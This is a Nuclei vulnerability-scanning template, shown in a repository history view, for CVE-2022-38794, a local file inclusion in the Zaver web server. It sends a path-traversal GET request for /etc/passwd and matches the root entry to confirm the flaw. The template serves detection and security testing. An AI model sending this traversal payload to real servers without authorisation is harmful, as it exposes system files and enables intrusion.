nuclei-templates/http/cves/2022/CVE-2022-38794.yaml

36 lines
804 B
YAML
Raw Normal View History

2022-08-28 20:35:50 +00:00
id: CVE-2022-38794
info:
name: Zaver - Local File Inclusion
author: pikpikcu
severity: high
description: |
Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.
2022-08-28 20:35:50 +00:00
reference:
- https://github.com/zyearn/zaver/issues/22
- https://nvd.nist.gov/vuln/detail/CVE-2022-38794
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-38794
cwe-id: CWE-22
2022-08-28 20:35:50 +00:00
tags: cve,cve2022,lfi,zaver
http:
2022-08-28 20:35:50 +00:00
- method: GET
path:
- '{{BaseURL}}/../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
2022-09-12 11:26:51 +00:00
part: body
2022-08-28 20:35:50 +00:00
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15